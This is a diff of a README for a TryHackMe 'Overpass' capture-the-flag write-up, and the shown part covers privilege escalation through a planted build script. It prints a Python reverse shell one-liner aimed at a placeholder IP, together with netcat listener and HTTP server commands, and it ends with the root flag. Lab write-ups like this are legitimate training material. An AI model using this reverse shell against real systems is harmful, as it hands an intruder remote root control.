felixstrobel/tryhackme/overpass/README.md

 ff02::2 ip6-allrouters
 </pre>

-<i>That's done so let's move on and create a file called `buildscript.sh` in the folder structure `downloads/src/`.
-Create these folders depending to your server.
-Into the `buildscript.sh` we paste a reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).</i>
+<i>That's done.
+So let's move on and create a file called `buildscript.sh` according to this folder structure `downloads/src/`.
+Create these folders depending on your server starting location.
+We paste a reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) into `buildscript.sh`.</i>

 <pre>
 python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
 </pre>

-<i>Now we have to set up a smal server and a netcat listener.<br>
+<i>Now we have to set up a small static file server and a `netcat` listener.<br>
 The server command: `sudo python3 -m http.server 80`<br>
 The netcat listener: `nc -lnvp 8080`<br>
-After some waiting our netcat listener catches the reverse shell.
+After some waiting our `netcat` listener catches the reverse shell.
 And we became root!
-We can `cat` the `root.txt`.</i>
+We can `cat` the `root.txt` out.</i>

 2. Escalate your privileges and get the flag in `root.txt`.<br>
    `thm{7f336f8c359dbac18d54fdd64ea753bb}`